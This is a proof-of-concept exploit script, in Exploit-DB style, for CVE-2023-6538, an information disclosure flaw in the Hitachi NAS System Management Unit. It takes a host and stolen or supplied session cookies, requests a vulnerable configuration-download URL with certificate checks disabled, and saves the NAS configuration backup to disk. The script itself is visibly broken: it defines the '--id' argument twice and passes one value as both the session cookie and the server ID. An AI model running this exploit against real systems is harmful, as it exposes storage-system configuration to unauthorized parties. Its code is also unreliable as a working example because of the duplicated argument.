HNAS SMU 14.8.7825 - Information Disclosure - CVE-2023-6538

1. # Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure
2. # CVE:              CVE-2023-6538
3. # Date:             2023-12-13
4. # Exploit Author:   Arslan Masood (@arszilla)
5. # Vendor:           https://www.hitachivantara.com/
6. # Version:          < 14.8.7825.01
7. # Tested On:        13.9.7021.04    
8.  
9. import argparse
10. from os import getcwd
11.  
12. import requests
13.  
14. parser = argparse.ArgumentParser(
15.     description="CVE-2023-6538 PoC",
16.     usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
17.     )
18.  
19. # Create --host argument:
20. parser.add_argument(
21.     "--host",
22.     required=True,
23.     type=str,
24.     help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
25.     )
26.  
27. # Create --id argument:
28. parser.add_argument(
29.     "--id",
30.     required=True,
31.     type=str,
32.     help="JSESSIONID cookie value"
33.     )
34.  
35. # Create --sso argument:
36. parser.add_argument(
37.     "--sso",
38.     required=True,
39.     type=str,
40.     help="JSESSIONIDSSO cookie value"
41.     )
42.  
43. # Create --id argument:
44. parser.add_argument(
45.     "--id",
46.     required=True,
47.     type=str,
48.     help="Server ID value"
49.     )
50.  
51. args = parser.parse_args()
52.  
53. def download_file(hostname, jsessionid, jsessionidsso, serverid):
54.     # Set the filename:
55.     filename = "registry_data.tgz"
56.  
57.     # Vulnerable SMU URL:
58.     smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"
59.  
60.     # GET request cookies
61.     smu_cookies = {
62.         "JSESSIONID":       jsessionid,
63.         "JSESSIONIDSSO":    jsessionidsso
64.         }
65.  
66.     # GET request headers:
67.     smu_headers = {
68.         "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
69.         "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
70.         "Accept-Language":              "en-US,en;q=0.5",
71.         "Accept-Encoding":              "gzip, deflate",
72.         "Dnt":                          "1",
73.         "Referer":                      f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
74.         "Upgrade-Insecure-Requests":    "1",
75.         "Sec-Fetch-Dest":               "document",
76.         "Sec-Fetch-Mode":               "navigate",
77.         "Sec-Fetch-Site":               "same-origin",
78.         "Sec-Fetch-User":               "?1",
79.         "Te":                           "trailers",
80.         "Connection":                   "close"
81.         }
82.  
83.     # Send the request:
84.     with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
85.         with open(filename, 'wb') as backup_archive:
86.             # Write the zip file to the CWD:
87.             backup_archive.write(file_download.content)
88.  
89.     print(f"{filename} has been downloaded to {getcwd()}")
90.  
91. if __name__ == "__main__":
92.     download_file(args.host, args.id, args.sso, args.id)
93.